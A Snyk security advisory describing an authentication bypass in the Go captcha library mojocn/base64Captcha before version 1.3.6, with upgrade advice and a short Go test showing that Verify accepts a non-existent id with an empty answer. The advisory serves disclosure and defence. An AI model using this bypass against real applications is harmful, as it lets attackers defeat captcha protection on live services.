Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade github.com/mojocn/base64Captcha
to version 1.3.6 or higher.
github.com/mojocn/base64Captcha is an a flexible and various captcha package.
Affected versions of this package are vulnerable to Authentication Bypass by Primary Weakness via the default implementation of Verify
to check a Captcha. An attacker can bypass the verification process by providing a non-existent id as the first parameter, an empty string as the second parameter, and setting the third parameter to true, which incorrectly results in the Captcha being considered correct.
package main
import (
"fmt"
"strconv"
"testing"
"github.com/mojocn/base64Captcha"
)
func TestCat(t *testing.T) {
var store = base64Captcha.DefaultMemStore
fmt.Println(strconv.FormatBool(store.Verify("dsad", "", true)))
}